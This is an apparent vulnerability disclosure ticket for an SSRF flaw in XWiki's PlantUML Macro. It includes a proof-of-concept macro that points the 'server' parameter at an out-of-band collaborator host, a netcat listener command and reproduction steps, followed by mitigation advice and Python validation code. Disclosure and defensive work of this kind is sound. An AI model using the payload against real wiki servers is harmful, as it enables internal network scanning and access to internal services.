PlantUML Macro / PLANTUML-25 Open

Server-Side Request Forgery (SSRF) in PlantUML Macro via 'server' parameter

Changes by Łukasz Rybak on 26/Nov/25 06:55
 
Description:

*Impact*

The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address (e.g., localhost or internal network services) or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.

This allows an attacker to:
# *Scan internal network ports* (by observing response times or error messages).
# *Access internal HTTP services* masquerading as the XWiki server.
# *Leak IP addresses* to external servers (OOB interaction).

h3. Technical Analysis PoC

*Vulnerable Component:* PlantUML Macro
*Vulnerable Parameter:* {{server="..."}}

*Root Cause:* The macro code accepts the user-supplied {{server}} string and uses it to construct an HTTP request to fetch the generated image, without ensuring the target is a permitted public PlantUML service.

h3. Reproduction Steps & Proof of Concept

# *Setup:* Use an OAST service (like Burp Collaborator) or a local listener ({{nc -lvp 4444}}) to capture the interaction.
# *Exploit Injection:* Create a wiki page with the following content:
{code}
{{plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"}}
@startuml
A -> B: SSRF Test
@enduml
{{/plantuml}}
{code}
!image-2025-11-25-20-31-00-469.png!
# *Execution:* Save and view the page.
!image-2025-11-25-20-31-57-213.png!
# *Observation:* The XWiki server initiates an HTTP connection to the specified target.
!image-2025-11-25-20-32-25-311.png!
h3. Patches

The {{server}} parameter should be one of the following:

* Removed (forcing the use of the globally configured PlantUML server).
* Validated against a strict allowlist of trusted domains defined in {{xwiki.properties}}.
* Restricted to prevent access to private IP ranges (RFC 1918) and loopback addresses.
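As an added illustration (not the PlantUML Macro's or XWiki's code), the Python below applies the allowlist and private-range checks from the list above to a user-supplied {{server}} value before any request is built; the allowlist contents and the function names are assumptions.

```python
"""Validate a user-supplied PlantUML server URL before any request is made.
Added illustration, not the PlantUML Macro's code: it applies the allowlist
and private-range mitigations listed above to the {{server}} value."""
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist for the example; a deployment would read it from
# configuration (the report suggests xwiki.properties).
TRUSTED_HOSTS = frozenset({"www.plantuml.com", "plantuml.example.org"})

class ServerNotAllowed(ValueError):
    """Raised when the supplied server URL fails validation."""

def _is_non_public_ip(host: str) -> bool:
    """True for a literal IP outside the public range (RFC 1918, 127/8,
    169.254/16, ::1, ...); hostnames return False and rely on the allowlist."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False

def validate_server(url: str, allowlist=TRUSTED_HOSTS) -> str:
    """Return a normalised base URL if it may be contacted, else raise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ServerNotAllowed(f"unsupported scheme: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ServerNotAllowed("userinfo in URL is not allowed")
    host = parts.hostname  # lower-cased, IPv6 brackets removed
    if not host:
        raise ServerNotAllowed("missing host")
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        raise ServerNotAllowed("invalid port") from exc
    if _is_non_public_ip(host):
        raise ServerNotAllowed(f"non-public address: {host}")
    if host not in allowlist:
        raise ServerNotAllowed(f"host not in allowlist: {host}")
    # Drop query and fragment so only the encoded diagram path is appended.
    port_part = f":{port}" if port else ""
    return f"{parts.scheme}://{host}{port_part}{parts.path.rstrip('/')}"

def is_allowed(url: str, allowlist=TRUSTED_HOSTS) -> bool:
    """Boolean form of validate_server for callers that need a verdict."""
    try:
        return bool(validate_server(url, allowlist))
    except ServerNotAllowed:
        return False
```

Because the allowlist is matched on the parsed hostname rather than on the raw string, URLs that embed a trusted name in the userinfo part or that point at a literal internal address are rejected before any connection is attempted.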

 
h3. Attribution

Reported by: Łukasz Rybak
GitHub: [https://github.com/lukasz-rybak]

Attachment: image-2025-11-26-06-54-50-628.png